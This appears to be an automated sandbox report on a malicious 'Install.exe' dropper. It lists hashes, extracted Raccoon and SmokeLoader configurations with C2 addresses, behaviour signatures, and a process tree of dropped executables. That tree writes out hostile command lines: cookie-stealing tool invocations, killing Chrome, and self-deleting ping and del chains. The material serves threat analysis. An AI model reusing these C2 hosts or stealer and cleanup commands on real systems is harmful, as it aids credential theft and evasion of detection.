Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    44s
  • max time network
    1801s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    04-05-2021 15:44

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 20 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 7 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 9 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 18 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2796
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2788
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2748
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2556
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2520
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1872
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1400
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1360
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1176
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1100
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                          PID:1052
                          • C:\Users\Admin\AppData\Roaming\dvudbji
                            C:\Users\Admin\AppData\Roaming\dvudbji
                            2⤵
                              PID:4480
                              • C:\Users\Admin\AppData\Roaming\dvudbji
                                C:\Users\Admin\AppData\Roaming\dvudbji
                                3⤵
                                  PID:7532
                              • C:\Users\Admin\AppData\Roaming\dvudbji
                                C:\Users\Admin\AppData\Roaming\dvudbji
                                2⤵
                                  PID:6628
                                  • C:\Users\Admin\AppData\Roaming\dvudbji
                                    C:\Users\Admin\AppData\Roaming\dvudbji
                                    3⤵
                                      PID:7932
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                  1⤵
                                    PID:300
                                  • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                    "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                    1⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:1108
                                    • C:\Users\Admin\AppData\Local\Temp\is-IAQS3.tmp\Install.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-IAQS3.tmp\Install.tmp" /SL5="$500F0,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of WriteProcessMemory
                                      PID:3664
                                      • C:\Users\Admin\AppData\Local\Temp\is-FJM3N.tmp\Ultra.exe
                                        "C:\Users\Admin\AppData\Local\Temp\is-FJM3N.tmp\Ultra.exe" /S /UID=burnerch1
                                        3⤵
                                        • Drops file in Drivers directory
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        • Drops file in Program Files directory
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of WriteProcessMemory
                                        PID:416
                                        • C:\Program Files\Uninstall Information\LEYKCSNNHM\ultramediaburner.exe
                                          "C:\Program Files\Uninstall Information\LEYKCSNNHM\ultramediaburner.exe" /VERYSILENT
                                          4⤵
                                          • Executes dropped EXE
                                          • Suspicious use of WriteProcessMemory
                                          PID:2256
                                          • C:\Users\Admin\AppData\Local\Temp\is-TL9P5.tmp\ultramediaburner.tmp
                                            "C:\Users\Admin\AppData\Local\Temp\is-TL9P5.tmp\ultramediaburner.tmp" /SL5="$50048,281924,62464,C:\Program Files\Uninstall Information\LEYKCSNNHM\ultramediaburner.exe" /VERYSILENT
                                            5⤵
                                            • Executes dropped EXE
                                            • Drops file in Program Files directory
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of FindShellTrayWindow
                                            • Suspicious use of WriteProcessMemory
                                            PID:2112
                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                              6⤵
                                              • Executes dropped EXE
                                              PID:3852
                                        • C:\Users\Admin\AppData\Local\Temp\7b-45309-8b1-5448c-9a6f5fcbc3358\Puxebyrefae.exe
                                          "C:\Users\Admin\AppData\Local\Temp\7b-45309-8b1-5448c-9a6f5fcbc3358\Puxebyrefae.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          • Checks computer location settings
                                          • Modifies system certificate store
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2212
                                        • C:\Users\Admin\AppData\Local\Temp\26-6df42-c8b-3f393-30841338a9a38\Saeshaetaejidi.exe
                                          "C:\Users\Admin\AppData\Local\Temp\26-6df42-c8b-3f393-30841338a9a38\Saeshaetaejidi.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of WriteProcessMemory
                                          PID:2848
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gaw01hli.w1v\sskiper.exe /s & exit
                                            5⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:3928
                                            • C:\Users\Admin\AppData\Local\Temp\gaw01hli.w1v\sskiper.exe
                                              C:\Users\Admin\AppData\Local\Temp\gaw01hli.w1v\sskiper.exe /s
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of WriteProcessMemory
                                              PID:4172
                                              • C:\Users\Admin\AppData\Local\Temp\1462192241.exe
                                                C:\Users\Admin\AppData\Local\Temp\1462192241.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5000
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                  8⤵
                                                    PID:5996
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    8⤵
                                                      PID:5912
                                                  • C:\Users\Admin\AppData\Local\Temp\2027040340.exe
                                                    C:\Users\Admin\AppData\Local\Temp\2027040340.exe
                                                    7⤵
                                                      PID:5984
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vfeevtdb.qoz\KiffMainE1.exe & exit
                                                  5⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:4720
                                                  • C:\Users\Admin\AppData\Local\Temp\vfeevtdb.qoz\KiffMainE1.exe
                                                    C:\Users\Admin\AppData\Local\Temp\vfeevtdb.qoz\KiffMainE1.exe
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4844
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p0k0bzmp.jzi\001.exe & exit
                                                  5⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:4904
                                                  • C:\Users\Admin\AppData\Local\Temp\p0k0bzmp.jzi\001.exe
                                                    C:\Users\Admin\AppData\Local\Temp\p0k0bzmp.jzi\001.exe
                                                    6⤵
                                                      PID:996
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eg0v3iff.wvp\installer.exe /qn CAMPAIGN="654" & exit
                                                    5⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:5064
                                                    • C:\Users\Admin\AppData\Local\Temp\eg0v3iff.wvp\installer.exe
                                                      C:\Users\Admin\AppData\Local\Temp\eg0v3iff.wvp\installer.exe /qn CAMPAIGN="654"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Enumerates connected drives
                                                      • Modifies system certificate store
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:4280
                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\eg0v3iff.wvp\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\eg0v3iff.wvp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619891245 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                        7⤵
                                                          PID:5196
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\45sryuii.hgt\gpooe.exe & exit
                                                      5⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:4644
                                                      • C:\Users\Admin\AppData\Local\Temp\45sryuii.hgt\gpooe.exe
                                                        C:\Users\Admin\AppData\Local\Temp\45sryuii.hgt\gpooe.exe
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:4712
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:5056
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:5628
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          7⤵
                                                            PID:4944
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            7⤵
                                                              PID:1796
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ucbjkyow.znb\sskiper.exe /s & exit
                                                          5⤵
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:384
                                                          • C:\Users\Admin\AppData\Local\Temp\ucbjkyow.znb\sskiper.exe
                                                            C:\Users\Admin\AppData\Local\Temp\ucbjkyow.znb\sskiper.exe /s
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:2672
                                                            • C:\Users\Admin\AppData\Local\Temp\1099761365.exe
                                                              C:\Users\Admin\AppData\Local\Temp\1099761365.exe
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:2856
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                8⤵
                                                                  PID:5316
                                                              • C:\Users\Admin\AppData\Local\Temp\1739545288.exe
                                                                C:\Users\Admin\AppData\Local\Temp\1739545288.exe
                                                                7⤵
                                                                  PID:5940
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d4l4rc2n.ec4\google-game.exe & exit
                                                              5⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:4604
                                                              • C:\Users\Admin\AppData\Local\Temp\d4l4rc2n.ec4\google-game.exe
                                                                C:\Users\Admin\AppData\Local\Temp\d4l4rc2n.ec4\google-game.exe
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:5092
                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                  "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                                  7⤵
                                                                    PID:5184
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\onufkgox.efl\askinstall39.exe & exit
                                                                5⤵
                                                                  PID:3688
                                                                  • C:\Users\Admin\AppData\Local\Temp\onufkgox.efl\askinstall39.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\onufkgox.efl\askinstall39.exe
                                                                    6⤵
                                                                      PID:5540
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                        7⤵
                                                                          PID:5976
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im chrome.exe
                                                                            8⤵
                                                                            • Kills process with taskkill
                                                                            PID:4908
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vpyye00t.0ah\y1.exe & exit
                                                                      5⤵
                                                                        PID:5852
                                                                        • C:\Users\Admin\AppData\Local\Temp\vpyye00t.0ah\y1.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\vpyye00t.0ah\y1.exe
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          PID:4160
                                                                          • C:\Users\Admin\AppData\Local\Temp\5hSWDKBm8m.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\5hSWDKBm8m.exe"
                                                                            7⤵
                                                                              PID:3156
                                                                              • C:\Users\Admin\AppData\Roaming\1620150629350.exe
                                                                                "C:\Users\Admin\AppData\Roaming\1620150629350.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620150629350.txt"
                                                                                8⤵
                                                                                  PID:2424
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\5hSWDKBm8m.exe"
                                                                                  8⤵
                                                                                    PID:488
                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                      ping 127.0.0.1 -n 3
                                                                                      9⤵
                                                                                      • Runs ping.exe
                                                                                      PID:5828
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\vpyye00t.0ah\y1.exe"
                                                                                  7⤵
                                                                                    PID:6540
                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                      timeout /T 10 /NOBREAK
                                                                                      8⤵
                                                                                      • Delays execution with timeout.exe
                                                                                      PID:6888
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zb2j1m00.wvl\setup.exe & exit
                                                                                5⤵
                                                                                  PID:6028
                                                                                  • C:\Users\Admin\AppData\Local\Temp\zb2j1m00.wvl\setup.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\zb2j1m00.wvl\setup.exe
                                                                                    6⤵
                                                                                      PID:5212
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\zb2j1m00.wvl\setup.exe"
                                                                                        7⤵
                                                                                          PID:5636
                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                            ping 1.1.1.1 -n 1 -w 3000
                                                                                            8⤵
                                                                                            • Runs ping.exe
                                                                                            PID:5352
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vzpw25q4.tfa\toolspab1.exe & exit
                                                                                      5⤵
                                                                                        PID:5224
                                                                                        • C:\Users\Admin\AppData\Local\Temp\vzpw25q4.tfa\toolspab1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\vzpw25q4.tfa\toolspab1.exe
                                                                                          6⤵
                                                                                            PID:5532
                                                                                            • C:\Users\Admin\AppData\Local\Temp\vzpw25q4.tfa\toolspab1.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\vzpw25q4.tfa\toolspab1.exe
                                                                                              7⤵
                                                                                                PID:5876
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mm4gv3rz.2em\GcleanerWW.exe /mixone & exit
                                                                                            5⤵
                                                                                              PID:4372
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jsvc5mof.aen\SunLabsPlayer.exe /S & exit
                                                                                              5⤵
                                                                                              • Loads dropped DLL
                                                                                              • Modifies registry class
                                                                                              PID:5184
                                                                                              • C:\Users\Admin\AppData\Local\Temp\jsvc5mof.aen\SunLabsPlayer.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\jsvc5mof.aen\SunLabsPlayer.exe /S
                                                                                                6⤵
                                                                                                  PID:5576
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz5D07.tmp\tempfile.ps1"
                                                                                                    7⤵
                                                                                                      PID:5656
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz5D07.tmp\tempfile.ps1"
                                                                                                      7⤵
                                                                                                        PID:6976
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz5D07.tmp\tempfile.ps1"
                                                                                                        7⤵
                                                                                                          PID:3800
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz5D07.tmp\tempfile.ps1"
                                                                                                          7⤵
                                                                                                            PID:5100
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz5D07.tmp\tempfile.ps1"
                                                                                                            7⤵
                                                                                                              PID:6124
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz5D07.tmp\tempfile.ps1"
                                                                                                              7⤵
                                                                                                                PID:1860
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz5D07.tmp\tempfile.ps1"
                                                                                                                7⤵
                                                                                                                  PID:5784
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\drcyr5aq.pme\005.exe & exit
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:996
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\drcyr5aq.pme\005.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\drcyr5aq.pme\005.exe
                                                                                                                6⤵
                                                                                                                  PID:5216
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n1510qiu.dup\Setup3310.exe /Verysilent /subid=623 & exit
                                                                                                                5⤵
                                                                                                                  PID:6072
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\n1510qiu.dup\Setup3310.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\n1510qiu.dup\Setup3310.exe /Verysilent /subid=623
                                                                                                                    6⤵
                                                                                                                      PID:5376
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-IFGCS.tmp\Setup3310.tmp
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-IFGCS.tmp\Setup3310.tmp" /SL5="$2038E,138429,56832,C:\Users\Admin\AppData\Local\Temp\n1510qiu.dup\Setup3310.exe" /Verysilent /subid=623
                                                                                                                        7⤵
                                                                                                                          PID:5620
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-2RM14.tmp\Setup.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-2RM14.tmp\Setup.exe" /Verysilent
                                                                                                                            8⤵
                                                                                                                              PID:5300
                                                                                                                              • C:\Program Files (x86)\Microsoft Data\Versium Research\hjjgaa.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft Data\Versium Research\hjjgaa.exe"
                                                                                                                                9⤵
                                                                                                                                  PID:680
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                    10⤵
                                                                                                                                      PID:4392
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                      10⤵
                                                                                                                                        PID:1572
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                        10⤵
                                                                                                                                          PID:7920
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                          10⤵
                                                                                                                                            PID:7080
                                                                                                                                        • C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe"
                                                                                                                                          9⤵
                                                                                                                                            PID:2964
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                              10⤵
                                                                                                                                                PID:6524
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill /im RunWW.exe /f
                                                                                                                                                  11⤵
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  PID:6576
                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                  timeout /t 6
                                                                                                                                                  11⤵
                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                  PID:5972
                                                                                                                                            • C:\Program Files (x86)\Microsoft Data\Versium Research\jg7_7wjg.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft Data\Versium Research\jg7_7wjg.exe"
                                                                                                                                              9⤵
                                                                                                                                                PID:5780
                                                                                                                                              • C:\Program Files (x86)\Microsoft Data\Versium Research\guihuali-game.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft Data\Versium Research\guihuali-game.exe"
                                                                                                                                                9⤵
                                                                                                                                                  PID:5976
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                                                                                                                    10⤵
                                                                                                                                                      PID:6228
                                                                                                                                                  • C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe"
                                                                                                                                                    9⤵
                                                                                                                                                      PID:5248
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-1IPAN.tmp\lylal220.tmp
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-1IPAN.tmp\lylal220.tmp" /SL5="$20472,237286,153600,C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe"
                                                                                                                                                        10⤵
                                                                                                                                                          PID:5316
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-SU39O.tmp\4_177039.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-SU39O.tmp\4_177039.exe" /S /UID=lylal220
                                                                                                                                                            11⤵
